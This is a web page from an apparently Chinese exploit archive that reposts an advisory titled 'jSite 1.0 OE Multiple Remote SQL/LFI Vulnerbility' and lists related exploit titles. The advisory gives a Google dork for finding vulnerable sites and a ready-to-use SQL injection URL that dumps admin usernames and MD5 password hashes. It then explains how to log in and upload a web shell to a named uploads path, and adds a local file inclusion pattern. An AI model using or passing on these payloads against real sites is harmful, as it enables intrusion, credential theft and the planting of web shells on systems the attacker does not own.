手机
当前位置:查字典教程网 >网络安全 >Exploit >jSite 1.0 OE (SQL/LFI) Multiple Remote Vulnerabilities
jSite 1.0 OE (SQL/LFI) Multiple Remote Vulnerabilities
摘要:--====================================================================...

--== ================================================================================ ==--

--== jSite 1.0 OE Multiple Remote SQL/LFI Vulnerbility ==--

--== ================================================================================ ==--

-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=[ SQL Injection Exploit ]=-=-=-=-=-=-=-=-=-=-=-=-

AUTHOR: S.W.A.T.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-

Download: http://www.sclek.com/jsite.zip

-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

DORK (google): "Powered by jSite 1.0 OE"

-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

DESCRIPTION:

You Can See Admin User & MD5 Password ..::.. Then You Can Crack It & Login ;)

-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

EXPLOITS:

www.site.com/?page=-1/**/union/**/select/**/1,2,3,concat_ws

(0x3a,user,pass),admin/**/from/**/jsite_users/*

-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

NOTE/TIP:

1 Week Off & I Be Back :D ;)

Admin Login Is At /admin/

U Can Upload Your Shell When U Login Successfully

From This Link: www.site.com/admin/index.php?menu=uploads

& Your Shell Will Be Appear Here: www.site.com/uploads/[file].php

-=-=-=-=-=-=--=-=-=-=-=-=-=-[ Local File Inclusion ]=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Exploit:

www.[target].com/Script/index.php?module=[LFI]

--== ================================================================================ ==--

--== jSite 1.0 OE Multiple Remote SQL/LFI Vulnerbility ==--

--== ================================================================================ ==--

【jSite 1.0 OE (SQL/LFI) Multiple Remote Vulnerabilities】相关文章:

minb 0.1.0 Remote Code Execution Exploit

MojoClassifieds 2.0 Remote Blind SQL Injection Exploit

AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability

Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit

BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit

VMware Workstation (hcmon.sys 6.0.0.45731) Local DoS Vulnerability

Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit

Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit

IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit

Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln

精品推荐
分类导航